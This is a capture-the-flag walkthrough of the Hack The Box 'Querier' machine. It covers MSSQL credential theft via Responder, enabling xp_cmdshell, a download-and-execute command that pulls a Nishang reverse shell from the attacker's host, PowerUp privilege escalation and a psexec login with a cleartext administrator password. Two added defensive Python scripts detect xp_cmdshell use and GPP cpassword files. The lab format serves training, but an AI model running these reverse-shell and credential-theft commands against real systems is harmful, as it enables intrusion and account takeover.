HTB – Querier Walkthrough

Nmap

SMB Shares

Get the file and unzip it

SQL credentials found in vbaProject.bin

Use Impacket's mssqlclient script to log in

Try to enable xp_cmdshell, but the current user is not privileged

Try to steal credentials by calling a fake share on your own server

Listen with responder

Crack the hash with john

Login again as the new user
mssqlclient.py mssql-svc@10.10.10.125 -db volume -windows-auth

Enable xp_cmdshell and now we have an RCE

Download the Nishang reverse shell from your own box with a PowerShell command to get a reverse shell:
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Add the following command at the end of the file
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.16 -Port 4444

Now execute the command on mssql to get a reverse shell
EXEC xp_cmdshell 'powershell iex(new-object net.webclient).downloadstring("http://10.10.14.16:8000/Invoke-PowerShellTcp.ps1")'
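The RCE above leaves a trail: SQL Server writes a configuration-change message to ERRORLOG whenever sp_configure flips xp_cmdshell on, and an informational xpstar.dll message the first time the procedure executes. The following Python is an added example (not part of the walkthrough) that scans ERRORLOG-style text for those two messages and replays the changes to say whether the option was left enabled; the log excerpt, timestamps and spids are constructed.

```python
"""Flag xp_cmdshell being enabled or first used in SQL Server ERRORLOG text.

Added example, not part of the walkthrough. Relies on two message formats
SQL Server writes to ERRORLOG: the sp_configure 'Configuration option ...
changed from X to Y' line and the 'Using xpstar.dll ... to execute extended
stored procedure' line. The excerpt below is constructed.
"""
import re
from typing import Dict, List, Optional

# Constructed ERRORLOG excerpt: timestamps and spids are made up, the message
# wording follows the format SQL Server uses for these events.
SAMPLE_ERRORLOG = """\
2019-03-02 10:15:01.22 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2019-03-02 10:15:01.30 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2019-03-02 10:15:07.01 spid51      Using 'xpstar.dll' version '2017.140.1000' to execute extended stored procedure 'xp_cmdshell'. This is an informational message only; no user action is required.
2019-03-02 11:00:00.00 spid9s      Server resumed execution after being idle 100 seconds. Reason: timer event.
2019-03-02 11:30:00.00 spid52      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

# One ERRORLOG line: "<date> <time> <spid> <message>".
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+s?)\s+(?P<msg>.*)$"
)
CONFIG_RE = re.compile(
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)"
)
XPSTAR_RE = re.compile(r"to execute extended stored procedure '(?P<proc>\w+)'")


def classify(message: str) -> Optional[Dict[str, str]]:
    """Map one ERRORLOG message to an event kind, or None if it is not relevant."""
    m = CONFIG_RE.search(message)
    if m:
        opt, new = m.group("opt"), m.group("new")
        if opt == "show advanced options" and new != "0":
            # Turning this on is the usual precursor to enabling xp_cmdshell.
            return {"kind": "precursor", "option": opt}
        if opt == "xp_cmdshell":
            return {"kind": "enabled" if new != "0" else "disabled", "option": opt}
        return None
    m = XPSTAR_RE.search(message)
    if m and m.group("proc") == "xp_cmdshell":
        return {"kind": "executed", "option": "xp_cmdshell"}
    return None


def find_xp_cmdshell_events(log_text: str) -> List[Dict[str, str]]:
    """Return the relevant events, in log order, with timestamp and spid attached."""
    events: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        lm = LINE_RE.match(line)
        if not lm:
            continue
        ev = classify(lm.group("msg"))
        if ev:
            ev.update(ts=lm.group("ts"), spid=lm.group("spid"))
            events.append(ev)
    return events


def currently_enabled(events: List[Dict[str, str]]) -> bool:
    """Replay the config changes in order; True if the last one left xp_cmdshell on."""
    state = False
    for ev in events:
        if ev["kind"] == "enabled":
            state = True
        elif ev["kind"] == "disabled":
            state = False
    return state


if __name__ == "__main__":
    found = find_xp_cmdshell_events(SAMPLE_ERRORLOG)
    for ev in found:
        print(f"{ev['ts']} {ev['spid']:8} {ev['kind']:9} {ev['option']}")
    print("xp_cmdshell left enabled:", currently_enabled(found))
```

On a real host, feed it the contents of the ERRORLOG file (and the rotated ERRORLOG.1 to ERRORLOG.6) from the instance's Log directory; the "executed" event is the useful one even when an attacker disables the option again afterwards, as the constructed excerpt shows.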

Privilege Escalation
Get the PowerUp.ps1 script to your own box:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Privesc/PowerUp.ps1
Then send it to Windows box:
Invoke-WebRequest 10.10.14.16:8000/PowerUp.ps1 -OutFile c:\users\mssql-svc\downloads\PowerUp.ps1

Run the script
Import-Module .\PowerUp.ps1
. .\PowerUp.ps1
Invoke-AllChecks

It will give us clear-text credentials from the GPP cache

psexec.py Administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.10.10.125
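The privilege escalation works because Group Policy Preference XML (here, the local GPP cache) still carries a cpassword attribute, and Microsoft published the AES key that protects it; MS14-025 stopped new ones being created but does not remove old files. As an added example (not from the walkthrough or PowerUp), the Python below audits GPP XML for any non-empty cpassword and reports the affected account and file without decrypting anything, so it can be run over a SYSVOL copy or a client's GPP cache as a hardening check. The XML samples are constructed, and the cpassword value is a placeholder.

```python
"""Audit Group Policy Preference XML for stored cpassword values.

Added example, not from the walkthrough or PowerUp. GPP XML files
(Groups.xml, ScheduledTasks.xml, Services.xml, DataSources.xml, Drives.xml,
Printers.xml), whether in SYSVOL or in a client's local GPP cache, may carry
a 'cpassword' attribute. Because the key is public, any non-empty value is a
finding regardless of content, so this reports presence only. Samples below
are constructed.
"""
import os
import xml.etree.ElementTree as ET
from typing import Dict, List

GPP_FILENAMES = {"Groups.xml", "ScheduledTasks.xml", "Services.xml",
                 "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attribute naming the account differs by preference type.
ACCOUNT_ATTRS = ("userName", "runAs", "accountName", "username")

# Constructed Groups.xml; the cpassword is a placeholder, not a real value.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="Administrator (built-in)" changed="2019-01-28 23:12:48">
    <Properties action="U" cpassword="PLACEHOLDER_CONSTRUCTED_VALUE"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="Administrator (built-in)"/>
  </User>
</Groups>
"""

# Constructed clean file: a group-membership change with an empty cpassword.
SAMPLE_CLEAN_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <Group name="Remote Desktop Users">
    <Properties action="U" groupName="Remote Desktop Users" cpassword=""/>
  </Group>
</Groups>
"""


def find_cpasswords(xml_text: str, source: str = "<memory>") -> List[Dict[str, str]]:
    """Return one finding per element that carries a non-empty cpassword attribute."""
    findings: List[Dict[str, str]] = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        if not elem.attrib.get("cpassword", ""):
            continue
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if a in elem.attrib), "<unknown>")
        findings.append({"file": source, "element": elem.tag, "account": account})
    return findings


def scan_tree(root_dir: str) -> List[Dict[str, str]]:
    """Walk a directory (a SYSVOL copy or GPP cache) and scan every GPP XML file in it."""
    findings: List[Dict[str, str]] = []
    for dirpath, _, files in os.walk(root_dir):
        for fname in files:
            if fname not in GPP_FILENAMES:
                continue
            path = os.path.join(dirpath, fname)
            try:
                with open(path, encoding="utf-8-sig") as fh:
                    findings.extend(find_cpasswords(fh.read(), path))
            except (OSError, ET.ParseError):
                # Unreadable or malformed files are skipped rather than aborting the audit.
                continue
    return findings


if __name__ == "__main__":
    results = find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml")
    results += find_cpasswords(SAMPLE_CLEAN_XML, "clean.xml")
    for f in results:
        print(f"{f['file']}: <{f['element']}> stores a cpassword for {f['account']}")
```

Any file this reports should have the preference item recreated without a stored password and the old XML removed from both SYSVOL and client caches, since deleting the policy alone leaves the cached copy behind.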
